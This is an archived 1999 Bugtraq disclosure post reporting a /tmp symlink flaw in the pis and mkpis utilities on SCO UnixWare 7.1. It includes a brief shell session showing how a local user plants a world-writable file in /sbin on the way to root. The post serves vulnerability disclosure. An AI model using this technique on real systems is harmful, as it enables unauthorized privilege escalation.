[13134] in bugtraq
Re: UnixWare local pis exploit (mkpis as well)
daemon@ATHENA.MIT.EDU (Brock Tellier)
Wed Dec 29 20:23:23 1999
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Message-Id: <19991229165826.18412.qmail@nwcst322.netaddress.usa.net>
Date: Wed, 29 Dec 1999 10:58:26 CST
Reply-To: Brock Tellier <btellier@USA.NET>
From: Brock Tellier <btellier@USA.NET>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Transfer-Encoding: 8bit
As a bonus, /usr/local/bin/mkpis is vulnerable to the same /tmp symlink
problem. It has the same permissions as pis.
-Brock
---
Brock Tellier <btellier@USA.NET> wrote:
Greetings,
OVERVIEW
A vulnerability in "/usr/local/bin/pis" on SCO UnixWare will allow any
user to create arbitrary files with group "sys" privileges. A full root
compromise is then trivial.
BACKGROUND
As usual, I've only tested UnixWare 7.1.
DETAILS
By creating a symlink between /tmp/pisdata and any sys-owned file we can
overwrite that file with ps output. If we point the symlink at a
non-existant file in a directory which we can write to (such as, say,
/sbin/ls), pis will create this file mode 666 owned by us, group of sys.
This is a fairly simple compromise. /sbin is writable by group sys. We
can create files in /sbin owned by us. And root's default $PATH starts
with /sbin.
EXPLOIT
bash-2.02$ ls -dal /sbin
drwxrwxr-x 2 root sys 3072 Dec 28 08:18 /sbin
bash-2.02$ ln -s /sbin/xnec /tmp/pisdata
bash-2.02$ pis
<program output>
bash-2.02$ ls -la /sbin/xnec
-rw-rw-rw- 1 xnec sys 5896 Dec 28 08:28 /sbin/xnec
bash-2.02$
Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
btellier@usa.net
____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1
____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1
